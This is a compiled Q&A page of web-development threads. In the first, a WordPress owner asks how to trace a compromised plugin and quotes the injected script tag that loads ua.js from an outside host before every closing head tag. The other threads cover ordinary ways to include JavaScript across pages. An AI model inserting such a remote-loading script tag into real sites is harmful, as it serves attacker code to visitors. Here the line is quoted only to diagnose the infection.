It appears there is a new exploit/hack going around where a Wordpress plugin is writing a .js file before every closing </head> tags in every Wordpress installation's .php files on my server. It's writing this code before every closing head tag:
<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>
My question is, how would I go about finding which files are writing code to others? That way I can find which plugin it is doing it, as I have several installations of WP in subdomains that are infected, and no idea of which one it's coming from! I'm sure there has to be a way to monitor this, whether it be my hosting company doing it or me.
If your site has been compromised, your better of by restoring a backup, but if you dont have one you're probably better of with a clean installation. But if you still wanna try to "fix" it, there are some files you could check for starters, the header theme file, the function file and all the plugin files to ensure its not enqued in a plugin to run.
the function you should be searching for is called wp_enqueue_script
Related
scripts from other providers I would normally include in my application in the following way:
<script src="https://apis.google.com/js/api.js"></script>
However I was wondering whether there is any drawback to just open the url: https://apis.google.com/js/api.js
and copy/paste the script inside my application
The advantage for this would be for example when using React - to just copy/paste the script inside the particular component that is using it.
However I'm not sure whether there are any drawbacks - for example whether these scripts might be updated sometimes by third parties (say Google) and it will stop working as I'll have old version copied locally.
Any idea whether there would be any problems with just copy/paste external third parties scripts locally into my code (say React component)?
The point of a CDN is to avoid downloading common scripts more than once: if you visit website A, and it gets https://apis.google.com/js/api.js, then you visit website B which also gets https://apis.google.com/js/api.js, your browser will only download it the first time, and website B will load faster.
Copying the script into your own file will work but you'll lose this advantage.
Yes, actually you can put it in a JS file and then in the Index.html you can do a reference to that file.
<script type='text/javascript' src="../../path/to/the/file/api.js"></script>
I have a site with static pages html and a javascript file that displays an informational message on the page.
Is there a way to start the .js file in all pages without having to write the file .js on every page of the site? for example with htaccess or other system
I'm not talking about redirecting to another page but on the page.
I know little of .htaccess so if you enter the code examples .htaccess, try it, I'd be grateful.
I hope that at least in this forum there is someone who knows how to help me.
Thanks for the answers.
REPLY: I must only add <script type="text/javascript" src="info.js"> </script> before of </body> but, there are many hundreds of pages. Notepad ++ is simple, but I will take many days to edit them all manually. I was wondering if there was a faster solution.
It is possible with a server side scripting language. For example, in PHP, you can add do something like the following, but you'd have to put <?php include("header.php"); ?> in your files. But if you change things down the line, you would only have to edit a file once.
<html>
<head>
<title>Blah...</title>
<?php include("header.php"); ?>
</head>
....
With .htaccess, you may be able to rewrite every file to a script like PHP, which will then find the file, read it, and inject the header where it needs to go. (On a busy site, this would be a very inefficient solution).
My recommendation: Just use an editor like Notepad++ and do a quick find/replace on the entire directory to replace </body> with <script ...></body>. Would be a quick, and simple solution.
Perhaps you can instruct Apache to do some on the fly data manipulation which adds the include for that file to your code.
But if you are able to do this, you should not do this every time the page gets displayed. As you say the content is static, so why not download it, have a program do the adjustments and upload the content again ?
Depending on how the JS needs to be added the page this can be some easy trick with any open source text editor like notepad++.
Notepad++ allows you to automatically replace in files, call Ctrl+Shift+F or choose this from the menu:
Either way will open this dialog:
Then simply have </body> replaced with <script ...>...</script></body>.
If this is the first time you use this function, you should only work with a copy of your important data !
I have a problem with a drupal site I didn't designed and which I have to modify.
The theme is a subtheme of Omega theme.
The problem is that I modify the main.js file and uploaded it back to the site, I cleared the cache, but when i tried to reload the page the loaded js is still like the old one, and has the name:
main.js.pagespeed.jm.IModC23.js
I think there could be a javascript file optimization module somewhere..
I can't find a system to make the page load the new javascript. I even go to the Performance page a uncheck "Aggregate javascript file"
Maybe the solution is easy but I couldn't find it anywhere..
Thank you
It sounds like pagespeed is aggregating all your js.
To turn it off you can put:
ModPagespeed off
in your .htaccess file and then turn it on again when your done.
This answer is talking about the same thing.
I have ASP.NET (4.0) web site which in turn has some JavaScript on it. As time goes I include more and more JS files into my aspx and ascx files. Usually I just add
<script type="text/javascript" src="/js/script1.js"></script>
That works fine for small add-ons, but in some cases script1 references to script2 and I need to add one more reference IN EACH PLACE where script1 is used.
Is that the proper way to include JS files? Or I would better load script2.js from script1.js (How do I include a JavaScript file in another JavaScript file?) that will guarantee it will be always included?
Could you please recommend references on the "best practice" with regards to this topic. I've googled for some, but found way too many links and really sank...
Thank you for your help!
The best way I can think of is to base your forms on a MasterPage and then reference all of your js file in the head section of your MasterPage.
I am building a public facing website and I am using a lot of jQuery and jQueryUI. What I have noticed is that most site on internet that use jQuery and jQueryUI don't have code like this in their pages.
<script type="text/javascript">
$(document).ready(function(){
$("a").click(function(event){
alert("Thanks for visiting!");
});
$( "input:submit" ).button();
});
</script>
I know this is a simplistic example but most sites, for example SO have only one obfuscated js file included for all the pages. It doesn't even seem like they use $(document).ready anywhere. On my current site it seems like I would need to include a js file for each page. My question is how is it suppose to be done and is there a best practice on how to use/include javascript in a page?
You wouldn't see the famous document.ready because most of the code is compressed usually into one big file for caching purposes. Just include your js at the end of the body like:
<script type="text/javascript" src="site.js"></script>
so this can be cached once and for all for every page.
According to W3C you could put scripts almost anywhere: http://www.w3schools.com/js/js_whereto.asp
So where should you put them?
Ege is right to say that you should put them as far down the page as possible because it will enable the browser to load more in parallel up front before it gets to the 'blocking' scripts. See here for more detail: http://developer.yahoo.com/performance/rules.html#js_bottom
Also, it is nearly always a good idea to put your scripts (and CSS) into external files so the browser can cache them tus saving the user from having to download them with the page each time.
Personally, I always use a CDN for script frameworks such as jQuery and the like as they can deliver external resources quicker than you probably can. Also the likelyhood of the browser having already cached jQuery for another site from the same CDN is far more likely. More detail here: http://code.google.com/apis/libraries/devguide.html
Finally, there's nothing wrong with using $(document).ready, but just be aware that this could affect the site's responsiveness and its pros may not outweight its cons. Again, more detail here: http://encosia.com/2010/08/18/dont-let-jquerys-document-ready-slow-you-down/
Hope this helped.
Whether you include the 'site.js' file at the top or bottom doesn't matter, unless your javascript is doing document.write to put something on the page. Then of course at the top would be desired. Some like it at the bottom so that the rest of the page will load before downloading the js file, which can sometimes delay the page load if it is a large file.